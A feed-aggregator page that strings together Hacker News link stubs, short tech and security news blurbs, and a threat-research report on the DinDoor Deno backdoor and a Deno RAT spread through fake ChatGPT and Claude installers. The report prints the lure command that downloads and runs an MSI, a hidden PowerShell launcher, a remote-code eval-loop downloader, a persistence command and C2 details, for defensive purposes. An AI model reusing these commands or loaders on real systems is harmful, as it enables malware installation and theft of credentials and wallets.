Feed aggregator

Article URL: https://journal.stuffwithstuff.com/2015/02/01/what-color-is-your-function/

Comments URL: https://news.ycombinator.com/item?id=48281515

Points: 3

# Comments: 0

Article URL: https://arxiv.org/abs/2605.24220

Comments URL: https://news.ycombinator.com/item?id=48281514

Points: 1

# Comments: 0

Article URL: https://www.reuters.com/business/world-at-work/uber-lyft-drivers-massachusetts-form-first-us-ride-share-union-2026-05-26/

Comments URL: https://news.ycombinator.com/item?id=48281509

Points: 3

# Comments: 0

My colleagues all use Claude code to generate the PRs, but while reviewing I only have a large block of code diff, and a single comment making it tough for me to make sense out of the diff.

Moreover, there was no shared knowledge base of vibes amongst the team, nor a way to revisit own reasoning later. I realised that just the code is not enough context, and thats why built Vibeshub.

It's a Claude Code plugin which auto uploads the transcript, and posts the comment on the PR with a link pointing towards it on vibeshub. The link contains a much more readable version of your chat, making it easy to skim, review, knowledge share for your teammates.

The repo used to build this (https://github.com/vibeshub/vibeshub) is the first customer of this product. Feel free to explore some PRs and traces here https://vibeshub.ai/vibeshub/vibeshub

Would love to hear from folks if you've faced similar issues when vibe-collaborating, and if this fits into your current workflow. Happy to answer any questions here, or shoot them my way at bhavya@vibeshub.ai

Comments URL: https://news.ycombinator.com/item?id=48281494

Points: 1

# Comments: 0

Article URL: https://www.reuters.com/business/aerospace-defense/pentagon-spars-with-spacex-over-starlink-price-hike-during-iran-war-2026-05-26/

Comments URL: https://news.ycombinator.com/item?id=48281492

Points: 1

# Comments: 0

Article URL: https://www.githubstatus.com/incidents/xflkh26pm7vv

Comments URL: https://news.ycombinator.com/item?id=48281489

Points: 2

# Comments: 1

Article URL: https://reasonstobecheerful.world/water-recycling-interview/

Comments URL: https://news.ycombinator.com/item?id=48281468

Points: 1

# Comments: 0

Article URL: https://www.reuters.com/world/supreme-court-sides-with-trump-fight-tied-speech-curbs-immigration-judges-2026-05-26/

Comments URL: https://news.ycombinator.com/item?id=48281464

Points: 2

# Comments: 0

Article URL: https://jackmaguire.org/blog/theoretical-upper-limit-us-stock-market/

Comments URL: https://news.ycombinator.com/item?id=48281457

Points: 1

# Comments: 0

Article URL: https://www.dw.com/en/germany-news-childfree-adults-to-pay-more-for-elder-care/live-77292208

Comments URL: https://news.ycombinator.com/item?id=48281453

Points: 8

# Comments: 0

Article URL: https://github.com/utsengar/crowbuster

Comments URL: https://news.ycombinator.com/item?id=48281443

Points: 1

# Comments: 0

Article URL: https://www.miximum.fr/revivarium/blog/godot-pixel-art-texture/

Comments URL: https://news.ycombinator.com/item?id=48281415

Points: 2

# Comments: 0

Brazilian platform provider VTEX is pushing hard into Europe with bold claims around artificial intelligence, but how relevant is that pitch for European CIOs?

Marlin AI automatically analyzes SaaS misconfigurations, investigates related activity across enterprise environments, and recommends remediation steps — while stopping short of fully autonomous corrective action.

The post AppOmni’s Marlin AI Brings Autonomous Investigation to SaaS Security appeared first on SecurityWeek.

Nimbus Manticore has continued its operations during and after the US military campaign against Iran.

The post Iranian APT Targets Aviation, Software Companies With Updated Tools appeared first on SecurityWeek.

During our threat hunting activities, we found fake installers and plugins impersonating popular software including ChatGPT, Claude, AutoTune, and Kontakt on GitHub and SourceForge distributing a Deno backdoor known as DinDoor. Attackers are using compromised YouTube channels to distribute links to these platforms. 

DinDoor ultimately drops different types of malware, including a stealthy remote access Trojan (RAT), which also uses the Deno JavaScript runtime.  

Attackers are increasingly abusing alternative JavaScript runtimes like Bun and Deno to bypass traditional detection methods. In one of our recent investigations we documented how attackers are using Bun as an initial infection vector to distribute NWHStealer. And in March, ThreatDown researchers also observed attackers using Deno to deliver CastleLoader through a multi-stage infection chain involving the ClickFix lure.  

These campaigns use Scoop (an alternative installer for Windows) and WinGet (the official Windows package manager) to install Deno on the victim’s machine. They then use the Deno runtime to execute a RAT capable of executing additional payloads, exfiltrating data from browsers, wallets, and other applications, which has an interesting peer-to-peer feature that uses Edge to hide malicious traffic. 

Legitimate platforms abused to spread malware

The infection chain is usually started via MSI files or PowerShell scripts downloaded from GitHub or SourceForge in most of the analyzed cases. Users are usually redirected to these malicious repositories via compromised YouTube channels. These videos currently total more than 50,000 views. 

Compromised YouTube channels with AI-generated videos 

The compromised YouTube channels create posts promoting different software and constantly switch between GitHub accounts to distribute the malware. 

YouTube posts linking to the malicious GitHub repositories

The fake software appears designed to target creators, AI enthusiasts, gamers, and technically inclined users who are more likely to download unofficial tools, cracked software, or community-distributed installers from sites like GitHub and SourceForge. We’ve observed fake MSIs and scripts masquerading as installers and plugins for legitimate software and brands such as ChatGPT, Claude, ZENOLOGY, Ableton Live, AutoTune, Kontakt. 

GitHub repository for fake ChatGPT installer 

The malicious repositories have a command for both Windows and macOS. These repositories ask users to open the terminal and copy a malicious command, which downloads and executes the MSI from GitHub. 

Fake plugin that asks the user to copy and execute the malicious command 

Malicious GitHub accounts create multiple repositories filled with fake software and plugins related to popular software to lure in more users. 

GitHub account with different malicious repositories

We found that the same backdoor was distributed through SourceForge, mimicking a legitimate game software called GearUP and an AI watermark remover software called BWR. 

The malicious MSI files hosted on SourceForge How to stay safe  

The attackers relied heavily on trust. GitHub and SourceForge are legitimate platforms, which makes fake projects look more convincing. We contacted GitHub, which quickly removed the malicious repositories, but users should expect new ones to continue appearing.

Here are  a few simple ways to stay safe:  

• Only download software from official vendor websites.  
• Be skeptical of “free”, cracked, or unofficial versions of paid software. 
• Be cautious with downloads from GitHub, SourceForge, forums, or file-sharing sites, especially from new or unknown accounts. 
• Attackers continue to create new profiles to distribute this malware across platforms.  Check the developer or publisher’s profile, its reputation, and how recently it was created before downloading anything. 
• Check that archive contents, images, and text files align with what you expected to download. Archive names and structures often follow recognizable malicious patterns.  
• Check the file’s publisher and digital signature before you run it. Windows, you can usually check this by right-clicking the file, selecting Properties > Digital Signatures. Keep in mind that a valid signature does not guarantee a file is safe, but missing or suspicious signatures are often a red flag. 

Technical analysis 

The malicious GitHub repositories ask the user to open cmd and execute a malicious command. The malicious commands download an MSI from GitHub and install it via msiexec. These repositories sometimes also contain PowerShell scripts to similarly initiate the infection chain. 

Example of a malicious command hosted on GitHub that starts the infection chain: 

curl -Lo %temp%\s.msi https://raw.githubusercontent.com/claude-free-plugin/install/main/install.msi && msiexec /i %temp%\s.msi 

The MSI drops a CMD file and a PowerShell script in a random directory specified in the MSI InstallationFolder and registry values. We detected different structures for these MSIs, with JavaScript instead of the CMD file, or with additional embedded files.

The “Ps1File” and “CmdFile” inside the MSI dropper

The CMD file executes the PowerShell script, with a name that changes in the analyzed infection chains: 

@set "SCRIPTDIR=%~dp0" @powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Start-Process powershell -ArgumentList ('-NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -File ""' + $env:SCRIPTDIR + '{Random name}.ps1""') -WindowStyle Hidden" 

The executed PowerShell script

The PowerShell script takes care of: 

• Ensuring the package manager Scoop is installed, and installing it if missing with the official script from get.scoop.sh. Scoop is a popular, open-source command-line software installer and package manager for Microsoft Windows. 
• Using Scoop to install WinGet (Windows Package Manager) if missing.  
• Installs Deno (a JavaScript/TypeScript runtime) via WinGet or Scoop if not present.

The usage of the package managers Scoop and WinGet to install additional software on the compromised machine is an interesting approach that gives the attacker more flexibility. 

Command executed to install Deno using WinGet: 

"C:\Users\admin\scoop\apps\winget\current\winget.exe" install --id DenoLand.Deno -e --accept-source-agreements --accept-package-agreements --silent The DinDoor Backdoor 

Next, the following stage is executed with the downloaded Deno executable: 

"C:\Users\admin\AppData\Local\Microsoft\WinGet\Packages\DenoLand.Deno_Microsoft.Winget.Source_8wekyb3d8bbwe\deno.exe" run -A http://{C2}/{random_path}.js

The returned code (the internal name is “launcher-1”) is a small eval-loop function that downloads the next stage (the internal name is “launcher-2”). The downloaded backdoor is publicly known as DinDoor. 

var a="{C2}".split(","),i=0;for(;;){let e=null;try{let t=await fetch(a[i%a.length]+"/{BUILD_ID}.js");if(!t.ok)throw 0;e=await t.text()}catch{i++,await new Promise(t=>setTimeout(t,5e3));continue}try{await(0,eval)("(async()=>{"+e+"})()")}catch{}await new Promise(t=>setTimeout(t,3e4))}

The backdoor handles persistence, sends information about the compromised system to the command-and-control server (C2), and executes additional payloads and commands returned by the C2.  The HTTP endpoints used for C2 communications vary between the analyzed cases.  

The backdoor obtains an ID from an HTTP endpoint (for example, /security-pool) and then uses that ID to obtain the next stage from /v2{ID}.js.   

The obtained stage is executed via stdin without being written to disk, using the command: 

deno run -A --no-check –

To achieve persistence, the backdoor runs a PowerShell command to create a RUN key that executes the downloader “launcher-1” used previously: 

conhost.exe --headless "<deno.exe>" -A "%APPDATA%\<hash>.js

This backdoor distributes several malware families in the analyzed cases. In this blog, we analyze one of the distributed payloads: a RAT that uses the Deno JavaScript runtime. 

Deno RAT 

The delivered RAT, like the other analyzed scripts, uses the Deno JavaScript environment and has full functionality to control the device, execute commands and payloads, and exfiltrate various types of data through its built-in stealer module.  

We did not find a specific name or attribution for this RAT. In the past, the RAT has been referred to as “Smokest” based on a specific value in the config. The similar commenting style and shared infrastructure suggest that the DinDoor developer and the RAT developer may be the same person or team. 

Picked up something you shouldn’t have?

RUN A FREE VIRUS SCAN

In addition to HTTP for C2 communication, the RAT also supports WebSocket communication, enabled when the JSON value isLiveEnabled returned from the C2 is set to true. 

The main function of the Deno RAT

The RAT supports different commands (exec, exec-ps, exec-sc, sysinfo, screenshot, stealer) and functionality: 

• Collect system information about the compromised device 
• Full bidirectional control through a custom VNC implementation over WebSocket 
• Target more than 50 crypto wallet extensions and 10 crypto software folders such as Atomic Wallet, Exodus, Electrum, and ByteCoin
• Collect data from browsers including Chrome, Chromium, Brave, Edge, Avast Browser, Edge, Opera, Vivaldi, CentBrowser, Kometa, Orbitum, 360Browser, and  Chromodo 
• Exfiltrate Telegram, Discord, and Lightcord data 
• Record and modify clipboard data  
• List folders, files and exfiltrate content from files with specific extensions  
• Capture screenshots using different methods  
• Execute additional payloads  
• Launch or terminate arbitrary processes  
• Execute commands with PowerShell  
• Establish SOCKS5 proxy tunnels over WebSocket 

One of the most interesting parts of the RAT is a peer-to-peer streaming mode that uses the Edge browser to hide traffic and make detection more difficult.

To stream live video directly to the operator without routing it through the C2 server, the RAT spawns a hidden Microsoft Edge process and connects to it via Chrome DevTools Protocol (CDP). It then injects a small WebRTC HTML page into Edge, turning the legitimate browser into a peer-to-peer video relay. The Deno agent captures and H.264-encodes the victim’s screen, passes the frames to the Edge page over CDP, and Edge forwards them directly to the operator’s browser over an encrypted WebRTC DataChannel. SDP and ICE signaling, needed to establish the direct connection, is exchanged through the existing C2 WebSocket. 

The injected HTML page inside Edge browser 

The RAT uses the following endpoints for C2 communication, which can vary between samples: 

• /health: checks the “ok” response from the C2 
• /token: receive config parameters, task delivery, results, and exfiltrated data 
• /vnc/agent/: WebSocket path used for VNC communication 

The config data is Base64-encoded and is sent in communications with the C2 as an authorization token. Decoded config data: 

{    "buildId": "cd361ef3159f5ce9",    "buildNote": "BWR",    "buildType": "msi-v2",    "proxyUrls": ["{C2}"],    "userId": "…",    "accessTokenHash": "…",    "iat": 1779372546,    "exp": 2094948546  }

We found different versions of this RAT, including a “light” version called “agent-lite” that supports only a few commands and uses Cloudflare Workers for C2 communication. 

The “light” version of the RAT

 

Acknowledgements 

• DinDoor: https://hunt.io/blog/dindoor-deno-runtime-backdoor-msi-analysis 
• Smokest: https://x.com/vxunderground/status/2013006601133687004 

Indicators of Compromise (IOCs) 

URLs 

• https[:]//github.com/claude-free-plugin/
• https[:]//github.com/ai-gen-profi 
• https[:]//github.com/wharfdemolisherpit 
• https[:]//sourceforge.net/projects/gearup/ 
• https[:]//sourceforge.net/projects/bluewaveremover/

Domains 

• claudescript[.]top: distribution website 
• ms-telemetry-gateway-us[.]com: C2 
• dakatawebstick[.]com: C2 
• ashpaltlonpro[.]com: C2 
• cf-proxy[.]cloud-analytics-services[.]workers.dev: C2 
• agilemast3r[.]duckdns[.]org: C2 
• geralnewlong[.]com: C2 
• hngfbgfbfb[.]cyou: C2 
• logicalnewrestore[.]com: C2

IPs 

• 23[.]227[.]196[.]107: C2 
• 45[.]137[.]99[.]121: C2 
• 31[.]57[.]129[.]23: C2 
• 66[.]78[.]40[.]107: C2 
• 193[.]233[.]198[.]132: C2

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Google's $100 screenless health tracker is sleek, but it has a major blind spot.

I've shot hours and hours of footage with my pre-production sample. Here are my thoughts about this new action camera.

Article URL: https://davidgraeber.org/articles/i-had-to-guard-an-empty-room/

Comments URL: https://news.ycombinator.com/item?id=48279189

Points: 1

# Comments: 0

Article URL: https://www.amazingcto.com/ai-the-next-absorption-event/

Comments URL: https://news.ycombinator.com/item?id=48279185

Points: 1

# Comments: 0